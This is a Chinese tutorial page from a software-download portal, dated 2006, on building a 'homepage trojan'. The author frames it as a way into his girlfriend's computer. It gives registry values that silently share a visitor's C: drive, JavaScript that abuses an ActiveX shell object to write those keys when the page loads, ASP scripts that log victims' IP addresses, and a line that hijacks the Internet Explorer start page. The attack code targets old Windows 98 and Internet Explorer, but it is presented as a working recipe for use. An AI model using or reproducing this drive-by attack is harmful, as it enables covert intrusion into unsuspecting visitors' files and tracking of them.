教程中国
PHOTOSHOP CS9.0中文版 MAYA 8.5 FOR WINDOWS Corel Painter v9.0 Flash MX2004 中文版 Illustrator cs2 中文版
VC++6.0含sp6 中英文版 VB6.0 +sp6 简体中文版 Borland Delphi 7汉化版 MSDN for vb6.0中文版 Visual Studio 2005简体
教程中国下属 文件存储共享专家BIBIDU.COM 提供大型软件,教材,源码,电影,音乐,图书等下载 更多精品请点此进入
  您目前所在位置: 教程中国 >> 电脑网络 >> 黑客技术 >> 黑功之一:主页木马的制作方法 RSS订阅
黑功之一:主页木马的制作方法
教程(视频,书籍)下载:  ASP.NET AutoCAD 数据库 C# ASP java photoshop 网页设计 delphi 3dmax Flash C++ VB 张孝祥 实例   更多请进入BIBIDU搜索
IT搜索引擎   
主页木马的制作方法

为了进女友的电脑,我费了好大劲,最后........想到的方法自认为不错就让大家看看

不知大家知不知道,windows98有个共享漏洞;
在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面
添加个键如RWC$然后再加几个键值:
"Flags"=dword:00000302
"Type"=dword:00000000
"Path"="C:\\"
这样就把c盘设为共享了,共享名为RWC$。而且你在网络属性中还看不到(把"Flags"=dword:00000302 改
成Flags"=dword:00000402就可看到 ),至于共享后的c:怎么攻击,我想不用我说了吧。
看过上一篇的人都知道通过网业改注册表是件很容易的事。为了照顾没看过的朋友我把js的源码负在下面

script language=JavaScript>

document.write("");
function f(){
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags",402,"REG_DWORD"
);
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD"
);
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\"
);
}
function init()
{
setTimeout("f()", 1000);
}

init();


当然仅共享还不行,我们还要知道访客的ip(呵呵,我们不能老害自己人)。
只要有后台程序就很容易,下面是一个asp的例子

<% @language="vbscript" %>
<%
response.buffer=true
Response.Expires=0
'dim rs,sql,conn

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "Driver={Microsoft Access Driver (*.mdb)}; DBQ=" & Server.MapPath("\ip") & "\ip.mdb;"
Set rs = Server.CreateObject("ADODB.Recordset")

sql="select * from ip "
rs.open sql,conn,3,2
rs.addnew
rs("ip")=Request.ServerVariables("REMOTE_HOST")
>这一句是记录ip
rs("datetime")=now()
>这一句是记录时间
rs.update
rs.close

%>

ip.mdb的内容是:
表 ip
三列
一列主键id
一列记录来访者的ip——ip
一列记录来访者的时间——datetime
这段程式很简单不难看懂。
你可通过下面的啊asp把数据读出

<% @language="vbscript" %>
<%
response.buffer=true
Response.Expires=0
'dim rs,sql,conn

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "Driver={Microsoft Access Driver (*.mdb)}; DBQ=" & Server.MapPath("\ip") & "\ip.mdb;"
Set rs = Server.CreateObject("ADODB.Recordset")

%>



浏览访问者


<%
sql="select * from ip order by datetime desc"
rs.open sql,conn,3,2
if not rs.eof then

response.write ""
response.write ""

do while not rs.eof

response.write ""
rs.movenext
loop

response.write "
IP地址访问时间
"rs("ip")&""rs("datetime")&"
"
else
response.write "无记录!"
end if

rs.close
%>



还有几个问题没解决
第一:对于拨号用户来说,每次上网都是便的如何每次都抓住他呢
最简单的方法是把他的主页改到木马页面上
下面是其js的代码(在第一部分的js中加入)

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://yoururl/index.htm");

这又有两个问题
1、中招者发现主页被改,又改回去了
2、一个用户每次上网都在数据库中留有记录,多次重复太浪费资源(虚拟主机的数据库好贵的,呵呵)

来源:upschool.cn
作者:
关键字:黑功之一,主页木马,制作方法
发表日期:2006-12-21 3:19:06

网页显示有限 阅读全文请下载本文完整版WORD文档

上一篇:透过不同结构的防火墙放置后门   下一篇:网络程序员的职业发展之路


2008-12-2 9:53:16
本文的相类似文章
  • 汽车金属漆的制作方法,非常不错的!
  • 平民级的片头光效制作方法
  • ASP用户在线的制作方法
  • 更改主页木马作乱 网游木马增多
  • MM抽象图制作方法
  • 掌握超五类双绞线原理与制作方法
  • 超初级的linux后门制作方法
  • 黑功之一:主页木马的制作方法
  • LOADING制作方法
  • Flash 中雪花效果的三种制作方法
  • 在学习中进步 在进步中成长 教程中国相随您的成长之路
    华腾联合科技股份有限公司版权所有
    广告联系:Rosibo@163.com